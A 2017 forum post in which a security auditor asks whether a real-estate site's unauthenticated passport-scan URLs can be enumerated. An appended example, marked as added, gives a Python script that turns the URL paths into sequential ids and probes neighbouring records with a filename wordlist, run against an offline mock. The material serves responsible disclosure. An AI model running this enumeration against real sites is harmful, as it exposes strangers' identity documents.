Ruck Posted June 26, 2017

Recently I have subscribed to a website for a real estate agency, since I am looking to buy a house. One of the requirements was to upload a scan of my passport. Already a bit anxious about the security, I covered sensitive elements with black tape before scanning and added a watermark stating the purpose of the scan before uploading.

Not really surprised, I got a mail stating my subscription was received, with a direct link to the passport image uploaded. I have subscribed a second time to find out that the process is the same and the link showed a similar layout/components:

<URL>/attachment_answers/000/428/835/<filename>.jpg.jpg?<id value>

Comparing the received URLs to the image I did not find usable logic (for me). The numbering in the URL seems to be site generated (and probably related to project and subscription numbering), but not easily guessable/predictable. The filename corresponds to my uploaded filename + jpg extension (hence the double jpg). The ID value does not seem to prevent anything (removing it still displays the passport image).

Since I did not discover any real security countermeasures, I am wondering if tooling exists or could easily be created/scripted that is able to discover other images on the site, some sort of image scraping. Googling this question only returns scrapers with (wordlisting? bruteforcing?) filenames or directories.

I want to know both for my own education (I'm active in the IT audit & security domain) and to be able to notify the real estate agency, but provided with a Proof of Concept (if it's easy to perform and within legal boundaries/responsible disclosure).

Could anyone indicate whether or not this is possible? And maybe an indication of effort and/or tooling required? If this requires additional information and/or further background of my intentions, please let me know what is required.
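The analysis the question asks about, as an added example that is not part of the original post and not code from the site in question: a small Python script that parses two observed attachment URLs, derives a numeric record id from the three zero-padded path segments (the layout is assumed to be an id partition, so 000/428/835 would be record 428835; that is a guess from the URL shape, not something the site confirms), measures the gap between the ids of two subscriptions, builds neighbouring candidate URLs from a filename wordlist, and probes them through an injected fetch function with a hard request cap. The host example.test, the filenames, the id values and the MOCK_SERVER table are constructed for the example; nothing is fetched from a real server.

```python
"""Added example: analysing and enumerating attachment URLs of the shape
/attachment_answers/000/428/835/<filename>.jpg.jpg?<id value>.

Host, ids, filenames and the MOCK_SERVER table are constructed for this
example; the id-partition layout is an assumption based on the URL shape.
"""
import itertools
import re
import time
from urllib.parse import urlsplit

# Three zero-padded groups of three digits, read as one 9-digit counter.
ATTACHMENT_RE = re.compile(r"^/attachment_answers/(\d{3})/(\d{3})/(\d{3})/([^/?]+)$")


def parse_attachment_url(url):
    """Return (record_id, filename, query) for an attachment URL, or None."""
    parts = urlsplit(url)
    m = ATTACHMENT_RE.match(parts.path)
    if not m:
        return None
    record_id = int("".join(m.group(1, 2, 3)))
    return record_id, m.group(4), parts.query


def id_to_partition(record_id):
    """Inverse of parse_attachment_url's join: 428835 -> '000/428/835'."""
    digits = f"{record_id:09d}"
    return "/".join(digits[i:i + 3] for i in range(0, 9, 3))


def id_gap(url_a, url_b):
    """Distance between the numeric ids of two observed uploads.

    A small gap between two subscriptions made minutes apart indicates a
    global sequential counter, i.e. every upload in between is addressable.
    """
    a = parse_attachment_url(url_a)
    b = parse_attachment_url(url_b)
    return abs(a[0] - b[0])


def candidate_urls(base, centre_id, filenames, radius):
    """Build URLs for ids within +/- radius of centre_id, for each filename.

    The numeric path is predictable; the filename is user-chosen, so a
    wordlist of likely names is the remaining unknown. The ?<id value> query
    is left out because, as observed in the post, the server does not need it.
    """
    ids = range(max(0, centre_id - radius), centre_id + radius + 1)
    return [f"{base}/attachment_answers/{id_to_partition(i)}/{name}"
            for i, name in itertools.product(ids, filenames)]


def probe(urls, fetch, max_requests, delay_s=0.0):
    """Try each URL via fetch(url) -> HTTP status; never exceed max_requests.

    The cap and delay are the responsible-disclosure controls: a proof of
    concept only needs to show that one neighbouring record resolves.
    """
    found = []
    for url in urls[:max_requests]:
        if fetch(url) == 200:
            found.append(url)
        time.sleep(delay_s)
    return found


# Constructed offline stand-in for the site: two records belonging to the
# tester's own subscriptions and one unrelated record in between.
MOCK_SERVER = {
    "/attachment_answers/000/428/835/passport.jpg.jpg": 200,
    "/attachment_answers/000/428/901/passport.jpg.jpg": 200,
    "/attachment_answers/000/428/840/scan.jpg.jpg": 200,
}


def mock_fetch(url):
    """Status lookup against MOCK_SERVER instead of a real HTTP request."""
    return MOCK_SERVER.get(urlsplit(url).path, 404)


if __name__ == "__main__":
    base = "https://example.test"
    first = f"{base}/attachment_answers/000/428/835/passport.jpg.jpg?a1b2c3"
    second = f"{base}/attachment_answers/000/428/901/passport.jpg.jpg?d4e5f6"
    print("gap between own uploads:", id_gap(first, second))
    wordlist = ["passport.jpg.jpg", "scan.jpg.jpg"]
    hits = probe(candidate_urls(base, 428835, wordlist, 5), mock_fetch, 50)
    for hit in hits:
        print("resolves:", hit)
```

What the result tells you: if the gap between two of your own uploads is small, the ids are a sequential counter and the directory part of the path is enumerable by anyone; the filename is then the only unknown, which is why search results point at wordlist and brute-force scrapers. For a proof of concept that stays within responsible disclosure, probe only your own two ids and a handful of immediate neighbours under a fixed request cap, and report separately that the `?<id value>` query string does not act as an authorization check.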